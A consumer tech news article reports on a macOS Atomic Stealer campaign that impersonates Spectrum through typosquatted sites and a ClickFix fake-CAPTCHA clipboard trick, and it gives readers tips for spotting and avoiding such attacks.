Even though people often think Macs are safe from malware, that definitely isn’t true. Case in point, a new Atomic Stealer campaign which is being used to infect the best MacBooks and other Apple computers with info-stealing malware has been spotted online.
As reported by The Hacker News, the campaign was discovered by the cybersecurity firm CloudSEK and it’s believed to be the work of Russian hackers due to comments in the malware’s source code.
What makes this campaign particularly interesting is the fact that in addition to typosquatting, it also uses social engineering to trick unsuspecting Mac users into falling for it. For those unfamiliar, typosquatting is a type of attack where cybercriminals register lookalike domains in order to lay traps for potential victims who mistype a popular site’s URL into their browser’s address bar. While they might think they’re on a popular company’s website, instead, they’re actually on a fake site designed to mimic the real one which is also used to spread dangerous malware.
Once infected with Atomic Stealer, the malware can steal personal and sensitive data from your Mac like passwords stored in your Apple Keychain, browser cookies, login credentials, credit card details and more.
Here’s everything you need to know about this new malware campaign along with some tips and tricks to prevent you from falling victim to it and other cyberattacks.
Not the Spectrum you were looking for
According to CloudSek, the hackers behind this new campaign are impersonating the U.S. internet and cable provider Spectrum using a number of different fake sites. While Spectrum’s official website can be found at spectrum[.]com, in its blog post, the firm highlights one of these fake sites which uses the URL panel-spectrum[.]net.
Once on this fake site, potential victims are asked to complete a reCAPTCHA to verify that they aren’t bots. Since many sites use this or similar forms of verification, many people might not even think twice when asked to check a box to prove they’re human. However, on the fake site shared by CloudSek, once verification fails, potential victims are then asked to complete an alternative verification instead.
However, when someone clicks on the button that reads “Alternative Verification”, a command is copied to their clipboard without their knowledge. A set of instructions appears that asks them to open a command prompt, paste the code that was copied to their clipboard and to hit “Enter” to run it on Windows. If someone is using a Mac though, slightly different instructions are shown that lead to the same outcome, they’re computer being infected with info-stealing malware.
On Macs, a malicious shell script is used to steal system passwords and download a variant of the Atomic Stealer malware. As CloudSek security researcher Koushik Pal points out in the company’s report, the script “uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.”
How to stay safe from Mac malware
Given that hackers use all kinds of different tricks to lead potential victims to fake sites spreading malware, it’s always best to type a company’s website into your browser’s address bar manually. However, you should also double check that you spelled it correctly.
If you don’t know a company’s official site, you can use a search engine to find it. One thing though that you want to be careful about is that you’re not clicking the first link that you see. The reason being is that Google and on other search engines, the links at the top are often ads while finding a company’s actual website often requires that you scroll a bit further down the page. The problem with clicking on an ad or a sponsored search result is that cybercriminals often use malicious ads to take users to fake sites instead of to a company’s actual site as anyone (even hackers) can buy ad space online.
From here, it’s a matter of knowing how to identify a ClickFix attack. Many sites ask that you complete a reCAPTCHA or other form of verification before entering. However, if a site asks you to open a command window and paste something from your clipboard there before hitting “enter”, this is a major red flag. A legitimate company might ask you to select all of the images that are cars but they would never copy code to your clipboard without your knowledge and then ask you to paste and run it somewhere else.
Although your Mac does come with built-in security software in the form of Apple’s own XProtect, it’s still a good idea to consider investing in one of the best Mac antivirus software solutions. Unlike free antivirus software, these paid options are updated more frequently and are more likely to spot and help you avoid newer malware strains like Atomic Stealer.
Given that attacks using this ClickFix technique have proven both successful and profitable for hackers and other cybercriminals, they’re not going anywhere anytime soon. This is why it makes sense to educate yourself and your family members about these sorts of threats so that you can spot any red flags before your Mac or PC becomes infected with malware.
